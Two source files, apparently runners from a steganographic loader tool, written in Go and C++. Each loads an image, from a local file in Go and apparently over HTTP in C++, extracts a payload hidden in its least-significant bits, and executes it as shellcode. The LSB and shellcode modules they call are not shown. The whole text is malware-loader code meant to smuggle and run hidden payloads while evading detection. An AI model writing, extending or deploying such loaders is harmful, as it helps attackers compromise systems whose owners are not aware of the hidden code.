File: runners/go/runner.go
package main

import (
	"os"
	"strconv"

	. "go_runner/algorithms"
	. "go_runner/image_sources"
	. "go_runner/payloads"
)

func main() {
	if len(os.Args) == 3 {
		payload_size, _ := strconv.Atoi(os.Args[2])
		payload_data := make([]byte, payload_size)

		location := os.Args[1]

		src := ImageFile{}
		alg := LSB{}
		pld := Shellcode{}

		img := src.Load(location)
		alg.Read(img, payload_data)
		pld.Run(payload_data)
	}
}

File: runners/cpp/cpp/runner.cpp
#include "runner.h"

int wmain(int argc, wchar_t** argv) {
    if (argc == 3) {      
        // Init Gdiplus
        GdiplusStartupInput gdiplusStartupInput;
        ULONG_PTR gdiplusToken;
        GdiplusStartup(&gdiplusToken, &gdiplusStartupInput, NULL);

        // Do the job
        const wchar_t* location = argv[1];
        int payload_size = _wtoi(argv[2]);

        // TEMPLATES GO HERE
        auto img = ImageSources::HttpX();
        Bitmap* bmp = img.Load(location);


        auto alg = Algorithms::LSB();
        uint8_t* payload_data = alg.Read(bmp, payload_size);


        auto pld = Payloads::Shellcode();
        pld.Run(payload_data, payload_size);

        // Shutdown Gdiplus
        GdiplusShutdown(gdiplusToken);
    }
    return 0;
}